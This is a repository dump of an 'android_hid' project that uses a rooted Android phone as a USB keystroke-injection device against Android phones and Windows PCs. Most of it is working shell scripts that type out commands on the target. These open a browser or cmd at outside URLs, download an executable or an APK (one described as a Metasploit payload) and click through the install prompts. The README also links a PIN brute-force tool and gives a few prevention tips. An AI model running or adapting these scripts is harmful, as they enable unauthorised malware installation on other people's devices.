├── part2
    ├── app-release.apk
    ├── hid-gadget-test
    ├── poc_android_gadget
    └── poc_pc_gadget
├── hid_pc
├── README.md
├── hid_attack
└── part1
    └── msf_install


/part2/app-release.apk:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/androidmalware/android_hid/HEAD/part2/app-release.apk


--------------------------------------------------------------------------------
/part2/hid-gadget-test:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/androidmalware/android_hid/HEAD/part2/hid-gadget-test


--------------------------------------------------------------------------------
/part2/poc_android_gadget:
--------------------------------------------------------------------------------
 1 | #!/system/bin/sh
 2 | 
 3 | 
 4 | echo down | ./hid-gadget-test /dev/hidg1 keyboard
 5 | echo down | ./hid-gadget-test /dev/hidg1 keyboard
 6 | echo left | ./hid-gadget-test /dev/hidg1 keyboard
 7 | echo enter | ./hid-gadget-test /dev/hidg1 keyboard
 8 | sleep 0.2
 9 | echo left-ctrl n | ./hid-gadget-test /dev/hidg1 keyboard
10 | sleep 0.5
11 | echo left-ctrl l | ./hid-gadget-test /dev/hidg1 keyboard
12 | sleep 0.6
13 | 
14 | echo g i t h u b | ./hid-gadget-test /dev/hidg1 keyboard
15 | echo period | ./hid-gadget-test /dev/hidg1 keyboard
16 | echo c o m | ./hid-gadget-test /dev/hidg1 keyboard
17 | echo slash | ./hid-gadget-test /dev/hidg1 keyboard
18 | echo a n d r o i | ./hid-gadget-test /dev/hidg1 keyboard
19 | echo d m a l | ./hid-gadget-test /dev/hidg1 keyboard
20 | echo w a r e | ./hid-gadget-test /dev/hidg1 keyboard
21 | echo slash | ./hid-gadget-test /dev/hidg1 keyboard
22 | echo a n d r o | ./hid-gadget-test /dev/hidg1 keyboard
23 | echo i d | ./hid-gadget-test /dev/hidg1 keyboard
24 | echo left-shift minus | ./hid-gadget-test /dev/hidg1 keyboard
25 | echo h i d | ./hid-gadget-test /dev/hidg1 keyboard
26 | 
27 | sleep 0.3
28 | echo enter | ./hid-gadget-test /dev/hidg1 keyboard


--------------------------------------------------------------------------------
/part2/poc_pc_gadget:
--------------------------------------------------------------------------------
 1 | #!/system/bin/sh
 2 | 
 3 | echo left-meta r | ./hid-gadget-test /dev/hidg1 keyboard
 4 | sleep 0.3
 5 | echo i e x p l o | ./hid-gadget-test /dev/hidg1 keyboard
 6 | echo r e | ./hid-gadget-test /dev/hidg1 keyboard
 7 | echo space | ./hid-gadget-test /dev/hidg1 keyboard
 8 | echo minus | ./hid-gadget-test /dev/hidg1 keyboard
 9 | echo k | ./hid-gadget-test /dev/hidg1 keyboard
10 | echo space | ./hid-gadget-test /dev/hidg1 keyboard
11 | 
12 | echo g i t h u b | ./hid-gadget-test /dev/hidg1 keyboard
13 | echo period | ./hid-gadget-test /dev/hidg1 keyboard
14 | echo c o m | ./hid-gadget-test /dev/hidg1 keyboard
15 | echo slash | ./hid-gadget-test /dev/hidg1 keyboard
16 | echo a n d r o i | ./hid-gadget-test /dev/hidg1 keyboard
17 | echo d m a l | ./hid-gadget-test /dev/hidg1 keyboard
18 | echo w a r e | ./hid-gadget-test /dev/hidg1 keyboard
19 | echo slash | ./hid-gadget-test /dev/hidg1 keyboard
20 | echo a n d r o | ./hid-gadget-test /dev/hidg1 keyboard
21 | echo i d | ./hid-gadget-test /dev/hidg1 keyboard
22 | echo left-shift minus | ./hid-gadget-test /dev/hidg1 keyboard
23 | echo h i d | ./hid-gadget-test /dev/hidg1 keyboard
24 | 
25 | sleep 0.3
26 | echo enter | ./hid-gadget-test /dev/hidg1 keyboard
27 | 


--------------------------------------------------------------------------------
/hid_pc:
--------------------------------------------------------------------------------
 1 | #!/system/bin/sh
 2 | 
 3 | echo left-meta r | ./hid-gadget-test /dev/hidg0 keyboard
 4 | echo c m d | ./hid-gadget-test /dev/hidg0 keyboard
 5 | sleep 0.5
 6 | echo enter | ./hid-gadget-test /dev/hidg0 keyboard
 7 | sleep 0.9
 8 | echo s t a r t | ./hid-gadget-test /dev/hidg0 keyboard
 9 | echo space | ./hid-gadget-test /dev/hidg0 keyboard
10 | echo i e x p l o | ./hid-gadget-test /dev/hidg0 keyboard
11 | echo r e  | ./hid-gadget-test /dev/hidg0 keyboard
12 | sleep 0.3
13 | echo space | ./hid-gadget-test /dev/hidg0 keyboard
14 | echo g i t h u b | ./hid-gadget-test /dev/hidg0 keyboard
15 | echo period | ./hid-gadget-test /dev/hidg0 keyboard
16 | echo c o m | ./hid-gadget-test /dev/hidg0 keyboard
17 | echo slash | ./hid-gadget-test /dev/hidg0 keyboard
18 | echo a n d r o i | ./hid-gadget-test /dev/hidg0 keyboard
19 | echo d m a l | ./hid-gadget-test /dev/hidg0 keyboard
20 | echo w a r e | ./hid-gadget-test /dev/hidg0 keyboard
21 | echo slash | ./hid-gadget-test /dev/hidg0 keyboard
22 | echo h i d | ./hid-gadget-test /dev/hidg0 keyboard
23 | echo slash | ./hid-gadget-test /dev/hidg0 keyboard
24 | echo r a w | ./hid-gadget-test /dev/hidg0 keyboard
25 | echo slash | ./hid-gadget-test /dev/hidg0 keyboard
26 | echo m a i n | ./hid-gadget-test /dev/hidg0 keyboard
27 | echo slash | ./hid-gadget-test /dev/hidg0 keyboard
28 | echo n o t m | ./hid-gadget-test /dev/hidg0 keyboard
29 | echo a l w a r e | ./hid-gadget-test /dev/hidg0 keyboard
30 | echo period | ./hid-gadget-test /dev/hidg0 keyboard
31 | echo e x e | ./hid-gadget-test /dev/hidg0 keyboard
32 | sleep 0.3
33 | echo enter | ./hid-gadget-test /dev/hidg0 keyboard
34 | sleep 1
35 | 
36 | echo right | ./hid-gadget-test /dev/hidg0 keyboard
37 | echo enter | ./hid-gadget-test /dev/hidg0 keyboard
38 | sleep 1
39 | echo left | ./hid-gadget-test /dev/hidg0 keyboard
40 | echo enter | ./hid-gadget-test /dev/hidg0 keyboard
41 | echo left | ./hid-gadget-test /dev/hidg0 keyboard
42 | echo enter | ./hid-gadget-test /dev/hidg0 keyboard
43 | sleep 0.3
44 | echo down | ./hid-gadget-test /dev/hidg0 keyboard
45 | echo enter | ./hid-gadget-test /dev/hidg0 keyboard
46 | sleep 0.3
47 | echo up | ./hid-gadget-test /dev/hidg0 keyboard
48 | echo enter | ./hid-gadget-test /dev/hidg0 keyboard


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
 1 | # android_hid
 2 | Use Android as Rubber Ducky against targeted Android device or PC
 3 | 
 4 | ## HID attack using Android
 5 | 
 6 | Using Android as Rubber Ducky against Android or Windows. This is not a new technique, just a demo how to perform HID attack using Android instead of rubber ducky. For targeted Android device it is not necessary to be rooted, have ADB/USB debugging enabled and device authorized, since attacker's smartphone behaves as connected keyboard. 
 7 | 
 8 | hid_attack - script contains customized commands that are executed (typed) against targeted Android device
 9 | hid_pc - script contains customized commands that are executed (typed) against targeted Windows 10
10 | 
11 | ### How to prevent this happening on Android
12 | 1) charge you smartphone using you own adapter
13 | 2) use none trivial PIN or password lockscreen protection
14 | 3) use mobile security software that will detect and prevent from launching payloads
15 | 
16 | ### How to prevent this happening on PC
17 | 1) Don't let anyone charge their smartphones in your PC
18 | 2) Use security software that will detect Metasploit payload
19 | 3) USB condom should help
20 | 
21 | ### PoC
22 | Android: https://youtu.be/aOWr6rWhsIs </br>
23 | PC: https://youtu.be/PJbqZm73MOc
24 | 
25 | ### Prerequisites
26 | - rooted Android with HID kernel support (e.g. NetHunter ROM)
27 | - OTG cable
28 | 
29 | ### Video Tutorial using NetHunter
30 | [![Watch the video](https://i.ibb.co/m0Ng2bc/thumbnail2.png)](https://youtu.be/bYfict-752k)
31 | In the video was used "part1/msf_install" PoC script. Tested payload is removed.
32 | 
33 | ### Video Tutorial without using NetHunter
34 | [![Watch the video](https://i.ibb.co/yYv4gkK/Social-Media-Conference-You-Tube-Thumbnail.png)](https://youtu.be/Mek9DMGy8os)
35 | USB Gadget Tool: https://github.com/tejado/android-usb-gadget </br>
36 | HID gadgets: https://github.com/pelya/android-keyboard-gadget/tree/master/hid-gadget-test </br>
37 | For easy access, I copied USB Gadget Tool and HID gadget to https://github.com/androidmalware/android_hid/tree/main/part2 </br>
38 | 
39 | 
40 | 
41 | ### Script info
42 | This is custom script, which might not work on your testing case scenario. Because of that, you must play around with pressed keys that are sent to targeted device. Website with my testing payload is not active anymore. List of all possible keys can be found on the link below.
43 | 
44 | ### Execute command
45 | bash hid_attack
46 | bash hid_pc
47 | 
48 | ### How to flash custom ROM with HID support
49 | https://github.com/pelya/android-keyboard-gadget
50 | 
51 | ### Brute-force pin using Android as HID
52 | https://github.com/urbanadventurer/Android-PIN-Bruteforce
53 | 
54 | ### List of all keys
55 | https://github.com/anbud/DroidDucky/blob/master/droidducky.sh
56 | 


--------------------------------------------------------------------------------
/hid_attack:
--------------------------------------------------------------------------------
 1 | #!/system/bin/sh
 2 | 
 3 | echo down | ./hid-gadget-test /dev/hidg0 keyboard
 4 | echo down | ./hid-gadget-test /dev/hidg0 keyboard
 5 | echo enter | ./hid-gadget-test /dev/hidg0 keyboard
 6 | sleep 0.2
 7 | echo left-ctrl n | ./hid-gadget-test /dev/hidg0 keyboard
 8 | sleep 0.5
 9 | echo left-ctrl l | ./hid-gadget-test /dev/hidg0 keyboard
10 | sleep 0.6
11 | echo g i t h u b | ./hid-gadget-test /dev/hidg0 keyboard
12 | sleep 0.5
13 | echo period | ./hid-gadget-test /dev/hidg0 keyboard
14 | sleep 0.2
15 | echo c o m | ./hid-gadget-test /dev/hidg0 keyboard
16 | sleep 0.2
17 | echo slash | ./hid-gadget-test /dev/hidg0 keyboard
18 | sleep 0.2
19 | echo a n d r o i | ./hid-gadget-test /dev/hidg0 keyboard
20 | sleep 0.2
21 | echo d m a l w | ./hid-gadget-test /dev/hidg0 keyboard
22 | sleep 0.2
23 | echo a r e | ./hid-gadget-test /dev/hidg0 keyboard
24 | sleep 0.2
25 | echo slash | ./hid-gadget-test /dev/hidg0 keyboard
26 | sleep 0.2
27 | echo h i d | ./hid-gadget-test /dev/hidg0 keyboard
28 | sleep 0.2
29 | echo slash | ./hid-gadget-test /dev/hidg0 keyboard
30 | echo r a w | ./hid-gadget-test /dev/hidg0 keyboard
31 | sleep 0.2
32 | echo slash | ./hid-gadget-test /dev/hidg0 keyboard
33 | echo m a i n | ./hid-gadget-test /dev/hidg0 keyboard
34 | sleep 0.2
35 | echo slash | ./hid-gadget-test /dev/hidg0 keyboard
36 | echo h i d | ./hid-gadget-test /dev/hidg0 keyboard
37 | sleep 0.2
38 | echo period | ./hid-gadget-test /dev/hidg0 keyboard
39 | sleep 0.2
40 | echo a p k | ./hid-gadget-test /dev/hidg0 keyboard
41 | sleep 0.2
42 | echo enter | ./hid-gadget-test /dev/hidg0 keyboard
43 | 
44 | echo tab | ./hid-gadget-test /dev/hidg0 keyboard
45 | sleep 0.5
46 | echo tab right | ./hid-gadget-test /dev/hidg0 keyboard
47 | sleep 0.5
48 | echo down | ./hid-gadget-test /dev/hidg0 keyboard
49 | sleep 0.5
50 | echo enter | ./hid-gadget-test /dev/hidg0 keyboard
51 | 
52 | sleep 1
53 | echo tab | ./hid-gadget-test /dev/hidg0 keyboard
54 | sleep 1
55 | echo tab right | ./hid-gadget-test /dev/hidg0 keyboard
56 | sleep 1
57 | echo tab right | ./hid-gadget-test /dev/hidg0 keyboard
58 | sleep 1
59 | echo tab right | ./hid-gadget-test /dev/hidg0 keyboard
60 | sleep 1
61 | echo enter | ./hid-gadget-test /dev/hidg0 keyboard
62 | 
63 | sleep 1
64 | echo right | ./hid-gadget-test /dev/hidg0 keyboard
65 | sleep 1
66 | echo right | ./hid-gadget-test /dev/hidg0 keyboard
67 | sleep 1
68 | echo enter | ./hid-gadget-test /dev/hidg0 keyboard
69 | sleep 1
70 | echo tab | ./hid-gadget-test /dev/hidg0 keyboard
71 | sleep 1
72 | echo right | ./hid-gadget-test /dev/hidg0 keyboard
73 | sleep 1
74 | echo enter | ./hid-gadget-test /dev/hidg0 keyboard
75 | 
76 | sleep 5.5
77 | echo tab | ./hid-gadget-test /dev/hidg0 keyboard
78 | echo right | ./hid-gadget-test /dev/hidg0 keyboard
79 | sleep 0.5
80 | echo enter | ./hid-gadget-test /dev/hidg0 keyboard
81 | 


--------------------------------------------------------------------------------
/part1/msf_install:
--------------------------------------------------------------------------------
 1 | #!/system/bin/sh
 2 | 
 3 | echo down | /data/data/com.offsec.nethunter/files/scripts/bin/hid-keyboard /dev/hidg0 keyboard
 4 | echo left | /data/data/com.offsec.nethunter/files/scripts/bin/hid-keyboard /dev/hidg0 keyboard
 5 | echo enter | /data/data/com.offsec.nethunter/files/scripts/bin/hid-keyboard /dev/hidg0 keyboard
 6 | sleep 0.2
 7 | echo left-ctrl n | /data/data/com.offsec.nethunter/files/scripts/bin/hid-keyboard /dev/hidg0 keyboard
 8 | sleep 0.5
 9 | echo left-ctrl l | /data/data/com.offsec.nethunter/files/scripts/bin/hid-keyboard /dev/hidg0 keyboard
10 | sleep 0.6
11 | echo l u k a s | /data/data/com.offsec.nethunter/files/scripts/bin/hid-keyboard /dev/hidg0 keyboard
12 | sleep 0.5
13 | echo s t e f | /data/data/com.offsec.nethunter/files/scripts/bin/hid-keyboard /dev/hidg0 keyboard
14 | sleep 0.5
15 | echo a n k o | /data/data/com.offsec.nethunter/files/scripts/bin/hid-keyboard /dev/hidg0 keyboard
16 | sleep 0.5
17 | echo period | /data/data/com.offsec.nethunter/files/scripts/bin/hid-keyboard /dev/hidg0 keyboard
18 | sleep 0.2
19 | echo c o m | /data/data/com.offsec.nethunter/files/scripts/bin/hid-keyboard /dev/hidg0 keyboard
20 | sleep 0.2
21 | echo slash | /data/data/com.offsec.nethunter/files/scripts/bin/hid-keyboard /dev/hidg0 keyboard
22 | sleep 0.2
23 | echo p a y l | /data/data/com.offsec.nethunter/files/scripts/bin/hid-keyboard /dev/hidg0 keyboard
24 | sleep 0.2
25 | echo o a d | /data/data/com.offsec.nethunter/files/scripts/bin/hid-keyboard /dev/hidg0 keyboard
26 | sleep 0.2
27 | echo period | /data/data/com.offsec.nethunter/files/scripts/bin/hid-keyboard /dev/hidg0 keyboard
28 | sleep 0.2
29 | echo a p k | /data/data/com.offsec.nethunter/files/scripts/bin/hid-keyboard /dev/hidg0 keyboard
30 | sleep 0.2
31 | echo enter | /data/data/com.offsec.nethunter/files/scripts/bin/hid-keyboard /dev/hidg0 keyboard
32 | sleep 1.2
33 | 
34 | echo tab | /data/data/com.offsec.nethunter/files/scripts/bin/hid-keyboard /dev/hidg0 keyboard
35 | sleep 1.2
36 | echo tab right | /data/data/com.offsec.nethunter/files/scripts/bin/hid-keyboard /dev/hidg0 keyboard
37 | sleep 1.2
38 | echo down | /data/data/com.offsec.nethunter/files/scripts/bin/hid-keyboard /dev/hidg0 keyboard
39 | sleep 1.2
40 | echo enter | /data/data/com.offsec.nethunter/files/scripts/bin/hid-keyboard /dev/hidg0 keyboard
41 | 
42 | sleep 1
43 | echo tab | /data/data/com.offsec.nethunter/files/scripts/bin/hid-keyboard /dev/hidg0 keyboard
44 | sleep 1
45 | echo tab right | /data/data/com.offsec.nethunter/files/scripts/bin/hid-keyboard /dev/hidg0 keyboard
46 | sleep 1
47 | echo tab right | /data/data/com.offsec.nethunter/files/scripts/bin/hid-keyboard /dev/hidg0 keyboard
48 | sleep 1
49 | echo enter | /data/data/com.offsec.nethunter/files/scripts/bin/hid-keyboard /dev/hidg0 keyboard
50 | 
51 | 
52 | sleep 1
53 | echo right | /data/data/com.offsec.nethunter/files/scripts/bin/hid-keyboard /dev/hidg0 keyboard
54 | sleep 1
55 | echo right | /data/data/com.offsec.nethunter/files/scripts/bin/hid-keyboard /dev/hidg0 keyboard
56 | sleep 1
57 | echo enter | /data/data/com.offsec.nethunter/files/scripts/bin/hid-keyboard /dev/hidg0 keyboard
58 | sleep 1
59 | echo tab | /data/data/com.offsec.nethunter/files/scripts/bin/hid-keyboard /dev/hidg0 keyboard
60 | sleep 1
61 | echo right | /data/data/com.offsec.nethunter/files/scripts/bin/hid-keyboard /dev/hidg0 keyboard
62 | sleep 1
63 | echo enter | /data/data/com.offsec.nethunter/files/scripts/bin/hid-keyboard /dev/hidg0 keyboard
64 | 
65 | sleep 5.5
66 | echo tab | /data/data/com.offsec.nethunter/files/scripts/bin/hid-keyboard /dev/hidg0 keyboard
67 | echo right | /data/data/com.offsec.nethunter/files/scripts/bin/hid-keyboard /dev/hidg0 keyboard
68 | sleep 0.5
69 | echo enter | /data/data/com.offsec.nethunter/files/scripts/bin/hid-keyboard /dev/hidg0 keyboard
70 | 


--------------------------------------------------------------------------------